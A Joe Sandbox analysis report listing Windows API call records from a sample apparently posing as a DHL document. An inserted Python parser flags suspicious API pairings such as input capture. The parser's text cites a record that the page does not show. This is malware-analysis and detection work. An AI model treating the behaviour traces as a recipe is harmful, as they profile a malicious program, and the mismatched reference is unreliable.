                                                                                    • Instruction Fuzzy Hash: EA310E71D00108AFDB00EFA9C885AEFB7FDEF99300F10446AE515E7251DA75AE458BA1
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • GetCursorPos.USER32(?), ref: 0083C4D2
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007EB9AB,?,?,?,?,?), ref: 0083C4E7
                                                                                    • GetCursorPos.USER32(?), ref: 0083C534
                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007EB9AB,?,?,?), ref: 0083C56E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2864067406-0
                                                                                    • Opcode ID: 1f6de94910cfc732fbe794b00c10e2f770dcf7668a417a4f29404f06936cb5e9
                                                                                    • Instruction ID: 6236323493997939076749703f3ce45a894a36835605e3a357d7386e68f90da1
                                                                                    • Opcode Fuzzy Hash: 1f6de94910cfc732fbe794b00c10e2f770dcf7668a417a4f29404f06936cb5e9
                                                                                    • Instruction Fuzzy Hash: A231A035601418EFCB25CF58C858EEA7BB5FB89311F044069F90ADB262C731AD90DBE4
                                                                                    APIs
                                                                                      • Part of subcall function 0080810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00808121
                                                                                      • Part of subcall function 0080810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0080812B
                                                                                      • Part of subcall function 0080810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0080813A
                                                                                      • Part of subcall function 0080810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00808141
                                                                                      • Part of subcall function 0080810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00808157
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008086A3
                                                                                    • _memcmp.LIBCMT ref: 008086C6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008086FC
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00808703
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1592001646-0
                                                                                    • Opcode ID: cacaee83d49316bf7f4efedfcb8f5abbe33d0c7d29f898935ed4e68ece705a1e
                                                                                    • Instruction ID: f624f43459d34681b9700647a268bf1978ca07e142591090606e323c45305a6e
                                                                                    • Opcode Fuzzy Hash: cacaee83d49316bf7f4efedfcb8f5abbe33d0c7d29f898935ed4e68ece705a1e
                                                                                    • Instruction Fuzzy Hash: 2E215A71E00208EBDB50DFA8CD49BAEB7B8FF54304F154059E595A7282DB31AE45CB90
                                                                                    APIs
                                                                                    • __setmode.LIBCMT ref: 007D09AE
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00817896,?,?,00000000), ref: 007B5A2C
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00817896,?,?,00000000,?,?), ref: 007B5A50
                                                                                    • _fprintf.LIBCMT ref: 007D09E5
                                                                                    • __setmode.LIBCMT ref: 007D0A1A
                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00805DBB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_fprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2975809307-0
                                                                                    • Opcode ID: bdfadf02f5496fc44df08a30c3e51392f7f787302209040812ad571853fc6b5b
                                                                                    • Instruction ID: 02f0141ad32b96004d5c96ef0092bb4580ad178b9acf5714f01cdf2c46214428
                                                                                    • Opcode Fuzzy Hash: bdfadf02f5496fc44df08a30c3e51392f7f787302209040812ad571853fc6b5b
                                                                                    • Instruction Fuzzy Hash: E211F331904204EFDB04B3B49C4AAFE7B78EF85320F144026F205A7282EE39588257E5
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008217A3
                                                                                      • Part of subcall function 0082182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0082184C
                                                                                      • Part of subcall function 0082182D: InternetCloseHandle.WININET(00000000), ref: 008218E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1463438336-0
                                                                                    • Opcode ID: 89940f32652ddb6ab234d284182d269d2720a6a8e10b2dd0ebb7939863d0a0ab
                                                                                    • Instruction ID: b9515d78aa63f7a11153cb3c0d902efaf5788f0120d96c6f37a8823dfcecff88
                                                                                    • Opcode Fuzzy Hash: 89940f32652ddb6ab234d284182d269d2720a6a8e10b2dd0ebb7939863d0a0ab
                                                                                    • Instruction Fuzzy Hash: 4A210131200615BFEF129F60EC44FBABBA9FF98701F20002AFA01D6250DB319850A7A1
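The "APIs" records above (the function that calls AttachThreadInput from under GetForegroundWindow and reads the caret position, the one that queries TokenIntegrityLevel and then calls LookupPrivilegeValueW, and the one that wraps InternetConnectW around InternetOpenUrlW) all share one line format. The parser below is an added example, not part of the Joe Sandbox report and not Joe Security's code: it reads that format, keeps track of which calls sit inside a listed subcall, pulls out annotated argument values such as TokenIntegrityLevel, and flags API combinations that co-occur in one function. The sample input is a constructed excerpt copied from those three records; the triage rules and the address-independent fingerprint are the editor's own scheme and do not reproduce Joe Sandbox's signature logic or its "API ID" encoding.

```python
"""Parse per-function "APIs" records from a Joe Sandbox report and flag
call combinations worth a second look. Added example, not report code."""
import hashlib
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One call line: optional "Part of subcall function XXXXXXXX:" prefix,
# then Name.MODULE, optional "(args)", then "ref: address".
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w:]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_ANNOT_RE = re.compile(r"\((\w+)\)")  # e.g. "00000003(TokenIntegrityLevel)"


@dataclass
class Call:
    name: str
    module: str
    args: List[str]
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee whose body holds this call, if indirect


@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)

    def names(self):
        return {c.name for c in self.calls}

    def direct(self):
        return [c for c in self.calls if c.subcall_of is None]

    def fingerprint(self):
        # Our own address-independent fingerprint: hash of the sorted
        # MODULE!Name set. "ref" addresses move with the image base;
        # the set of imports a function touches does not.
        key = "|".join(sorted(f"{c.module}!{c.name}" for c in self.calls))
        return hashlib.sha256(key.encode()).hexdigest()[:16]


def parse_records(text: str) -> List[Record]:
    """Split on "APIs" headers; lines that are not call lines are ignored."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = Record()
            records.append(current)
            continue
        m = _CALL_RE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(Call(
                name=m["name"], module=m["module"].upper(), args=args,
                ref=int(m["ref"], 16),
                subcall_of=int(m["sub"], 16) if m["sub"] else None))
    return records


# Our triage rules: every API in a set must occur in the same function,
# directly or inside a listed subcall. Chosen from what this page shows.
RULES = {
    "input_capture": {"GetForegroundWindow", "AttachThreadInput"},
    "integrity_check": {"GetTokenInformation", "LookupPrivilegeValueW"},
    "wininet": {"InternetConnectW", "InternetOpenUrlW"},
}


def token_info_classes(record: Record) -> List[str]:
    """Annotated TokenInformationClass values passed to GetTokenInformation."""
    out = []
    for c in record.calls:
        if c.name == "GetTokenInformation" and len(c.args) > 1:
            out += _ANNOT_RE.findall(c.args[1])
    return out


def triage(record: Record) -> List[str]:
    return sorted(label for label, need in RULES.items() if need <= record.names())


# Constructed sample: three records copied from this report page.
SAMPLE = """\
APIs
• GetForegroundWindow.USER32 ref: 00834F02
  • Part of subcall function 00813641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0081365B
  • Part of subcall function 00813641: GetCurrentThreadId.KERNEL32 ref: 00813662
  • Part of subcall function 00813641: AttachThreadInput.USER32(00000000,?,00815005), ref: 00813669
• GetCaretPos.USER32(?), ref: 00834F13
• ClientToScreen.USER32(00000000,?), ref: 00834F4E
• GetForegroundWindow.USER32 ref: 00834F54
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
APIs
  • Part of subcall function 0080810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00808121
  • Part of subcall function 0080810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0080812B
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008086A3
• _memcmp.LIBCMT ref: 008086C6
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 008086FC
• HeapFree.KERNEL32(00000000), ref: 00808703
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008217A3
  • Part of subcall function 0082182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0082184C
  • Part of subcall function 0082182D: InternetCloseHandle.WININET(00000000), ref: 008218E9
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        first = rec.direct()[0]
        print(f"#{i} {first.name} @ {first.ref:08X} fp={rec.fingerprint()} "
              f"flags={triage(rec)} token_classes={token_info_classes(rec)}")
```

The rules deliberately require co-occurrence inside one function: GetForegroundWindow on its own is in every GUI program, but paired with AttachThreadInput and GetCaretPos it is the pattern for reading another window's input state. The fingerprint is what to compare across samples or re-analyses, since the "ref" addresses in the report shift whenever the image is loaded at a different base.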
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(?,0083FAC0), ref: 00813A64
                                                                                    • GetLastError.KERNEL32 ref: 00813A73
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00813A82
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0083FAC0), ref: 00813ADF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 2267087916-0
                                                                                    • Opcode ID: 7b72890b603a082dd27f4308dcfe358f8eac2491236401ca8e23e729118f56a4
                                                                                    • Instruction ID: 4b03450445d6a6b5e57460f4df472e589e02e11e94b791402fd96b82d8158e19
                                                                                    • Opcode Fuzzy Hash: 7b72890b603a082dd27f4308dcfe358f8eac2491236401ca8e23e729118f56a4
                                                                                    • Instruction Fuzzy Hash: 2B218274508615DF8300EF28C8859EB77ECFE55368F144A29F499C72A2D7319A85CB82
                                                                                    APIs
                                                                                      • Part of subcall function 0080F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0080DCD3,?,?,?,0080EAC6,00000000,000000EF,00000119,?,?), ref: 0080F0CB
                                                                                      • Part of subcall function 0080F0BC: lstrcpyW.KERNEL32(00000000,?,?,0080DCD3,?,?,?,0080EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0080F0F1
                                                                                      • Part of subcall function 0080F0BC: lstrcmpiW.KERNEL32(00000000,?,0080DCD3,?,?,?,0080EAC6,00000000,000000EF,00000119,?,?), ref: 0080F122
                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0080EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0080DCEC
                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0080EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0080DD12
                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0080EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0080DD46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                    • String ID: cdecl
                                                                                    • API String ID: 4031866154-3896280584
                                                                                    • Opcode ID: 77985e8d5462813d9b4911904e602f3d4ad2e2deac11f676af77c71b09ace6a5
                                                                                    • Instruction ID: 86f4984893cb56a74e7ddb0f432b77ce9ca673c1fc2afcdc7cff11f9acd11c59
                                                                                    • Opcode Fuzzy Hash: 77985e8d5462813d9b4911904e602f3d4ad2e2deac11f676af77c71b09ace6a5
                                                                                    • Instruction Fuzzy Hash: CA11BE3A200305EBDB25AF74DC45D7A77A9FF45310B40842AF906CB2A1EB719C40DBD1
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 007E5101
                                                                                      • Part of subcall function 007D571C: __FF_MSGBANNER.LIBCMT ref: 007D5733
                                                                                      • Part of subcall function 007D571C: __NMSG_WRITE.LIBCMT ref: 007D573A
                                                                                      • Part of subcall function 007D571C: RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,007D0DD3,?), ref: 007D575F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 614378929-0
                                                                                    • Opcode ID: 6640b437a6f2bc02ecda04b28c907bd72541fa1a1aee850e4f0bd738400808a4
                                                                                    • Instruction ID: 85af9a4359d05d23e41c19e32edbaa93c05ade5bc205ea7666fb05dcb06888b0
                                                                                    • Opcode Fuzzy Hash: 6640b437a6f2bc02ecda04b28c907bd72541fa1a1aee850e4f0bd738400808a4
                                                                                    • Instruction Fuzzy Hash: 95110AB1906A5DEFCB312F76EC4975D37A86F08365F20052BF90496351DE3CC8409791
                                                                                    APIs
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00817896,?,?,00000000), ref: 007B5A2C
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00817896,?,?,00000000,?,?), ref: 007B5A50
                                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 00826399
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 008263A4
                                                                                    • _memmove.LIBCMT ref: 008263D1
                                                                                    • inet_ntoa.WSOCK32(?), ref: 008263DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                    • String ID:
                                                                                    • API String ID: 1504782959-0
                                                                                    • Opcode ID: 224cd6d955805cfb0dcbd3d2009775bec692f8f8d4d2a4cc4d597af630a09fba
                                                                                    • Instruction ID: 9067026adf54f86f869ad09c963820904b901b243451ce53309c536eafa603ac
                                                                                    • Opcode Fuzzy Hash: 224cd6d955805cfb0dcbd3d2009775bec692f8f8d4d2a4cc4d597af630a09fba
                                                                                    • Instruction Fuzzy Hash: 49110A31900109EFCB04FBA4DD4AEEEBBB8FF49310B144465F605A7262DB34AE14DBA1
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00808B61
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00808B73
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00808B89
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00808BA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: f4cf16b871edc3f49971e91e6d619a34d1866ba4606022a264b2b30355c21f8f
                                                                                    • Instruction ID: 513fd2a702a9e57e89032e31abcf9ad319b43a643a1882440f5f725e7d44686b
                                                                                    • Opcode Fuzzy Hash: f4cf16b871edc3f49971e91e6d619a34d1866ba4606022a264b2b30355c21f8f
                                                                                    • Instruction Fuzzy Hash: 93115A79901218FFEB10DFA5CC85FADBBB8FB48310F2040A5EA00B7290DA716E50DB94
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 007B12D8
                                                                                    • GetClientRect.USER32(?,?), ref: 007EB5FB
                                                                                    • GetCursorPos.USER32(?), ref: 007EB605
                                                                                    • ScreenToClient.USER32(?,?), ref: 007EB610
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4127811313-0
                                                                                    • Opcode ID: c6ce6c59b097f297a1527eac05a3db924e4565684b9b42c5432bb62e6ed7a79d
                                                                                    • Instruction ID: 4df7bfb2731a43b1321b9fa0ff2141222551eff9dc9a302a43fcfe1297073ef9
                                                                                    • Opcode Fuzzy Hash: c6ce6c59b097f297a1527eac05a3db924e4565684b9b42c5432bb62e6ed7a79d
                                                                                    • Instruction Fuzzy Hash: 55115836A00019EBCB04EF98C899AEE77B8FB45301F800866FA01E3151C734BA51CBA5
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0080FCED,?,00810D40,?,00008000), ref: 0081115F
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0080FCED,?,00810D40,?,00008000), ref: 00811184
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0080FCED,?,00810D40,?,00008000), ref: 0081118E
                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,0080FCED,?,00810D40,?,00008000), ref: 008111C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                    • String ID:
                                                                                    • API String ID: 2875609808-0
                                                                                    • Opcode ID: a26f2234cbc66d472e9b5d447a6407dad33cd396044f4181cb9f70d5ff9bf96f
                                                                                    • Instruction ID: 18c20fd20aa251dff201477ec269bd365ccd9bbfd3a5a5b02bb044233707575e
                                                                                    • Opcode Fuzzy Hash: a26f2234cbc66d472e9b5d447a6407dad33cd396044f4181cb9f70d5ff9bf96f
                                                                                    • Instruction Fuzzy Hash: B011F531D0151DE7CF009FA5E848AEEFB78FF49711F015455EB41A2241CA7095A08B95
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0080D84D
                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0080D864
                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0080D879
                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0080D897
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                    • String ID:
                                                                                    • API String ID: 1352324309-0
                                                                                    • Opcode ID: 2aa28dc5ccc2befe43c381ff825d45ad3a7393c49bd1ea9908769ba8f92df31e
                                                                                    • Instruction ID: b92ceb8dc69749fc53ced51860dbe6eef9a4e8d6aa2b3509f950742241f322a6
                                                                                    • Opcode Fuzzy Hash: 2aa28dc5ccc2befe43c381ff825d45ad3a7393c49bd1ea9908769ba8f92df31e
                                                                                    • Instruction Fuzzy Hash: D7115E75A05309DBE7208F90ED08F92BBBCFF40B14F10C979AA16D6091D7B0E5499BA1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
